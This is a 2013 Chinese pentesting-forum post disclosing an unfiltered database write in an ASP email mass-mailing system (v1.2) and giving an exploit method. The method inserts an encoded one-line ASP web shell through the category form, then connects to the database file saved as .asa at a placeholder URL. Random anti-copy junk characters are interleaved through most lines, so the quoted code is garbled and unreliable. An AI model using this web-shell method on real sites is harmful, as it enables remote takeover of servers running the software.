中国网络渗透测试联盟

标题: 铜板儿网邮件群发统计系统 v1.2 漏洞 [打印本页]
作者: admin    时间: 2013-3-14 20:14
标题: 铜板儿网邮件群发统计系统 v1.2 漏洞
'Fenlei.asp . e1 O5 ^. @- @
/ u2 m6 l$ M5 d5 t" ^- X
IF Request.QueryString("Action")="del" Then , b, s5 D, m0 Q0 q6 H- q; L
ID=Request.QueryString("ID") " {: b) e0 i4 z
IF Countss ("tui","Fenlei",ID )<>0 then ! d! k5 E$ h; `* j% }
'略 2 g$ p& |9 A) X0 Q7 T1 F2 ^! D# v9 j
IF Request.QueryString("Action")="Add" Then
! A8 {0 l! @6 ]4 U& |Tname=Request.Form("Typename")
! ~2 v# Z; B7 rSet Rs=Server.CreateObject("adodb.Recordset") & E: a" O% y. T# \- b
Sql="Select * From Fenlei Order by id Desc "
  E6 H5 m& `* I: MRs.Open Sql,Conn,1,3
: W0 G6 _5 S! nRs.Addnew
# R% e# W* y, g' g/ a1 yRs("Typename")=Tname 0 q  n6 N7 J% S% X" f) b3 [, J
'略
+ S2 `8 R/ |9 |- ~Set Rs=Server.CreateObject("adodb.Recordset")
: U) {: D' {7 K* @Sql="Select * From Fenlei Order by id Desc " 8 S: z1 \! x+ N/ ^# y7 }9 |
Rs.Open Sql,Conn,1,1
( F" a$ A' h  l/ c+ _4 ?'略
& q! b7 r# ~0 A; U5 C+ F8 L$ _: `%>
5 G  F0 W+ g# n
; |) X  S5 f+ w) |" j & o  l' L- E: y( ^$ n
1 q" `9 z; u9 l
没有过滤,直接写入数据库。
9 T) D% m& i& e( [* u; Q2 {: f) w
. n  A8 ~  u( ~1 T0 `利用方法:: F6 Z4 N) m5 \& o8 P5 i
1 S; v2 M4 H7 }1 U5 v2 [# Y
插入:┼攠數畣整爠煥敵瑳∨≡┩>. N1 H9 u( P$ ^# ^
: s9 v  `% P! O" }9 Z( z2 L1 _/ }

' o1 a1 K3 f* h0 L& }连接: http://www.xxx.com/###tongbaner.asa ' n: O# t% R) l7 e+ O
'默认安装文件: 0 }, \0 d9 f. |/ f9 J
'install.asp
+ S& T( Y7 z$ v. T1 ?



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2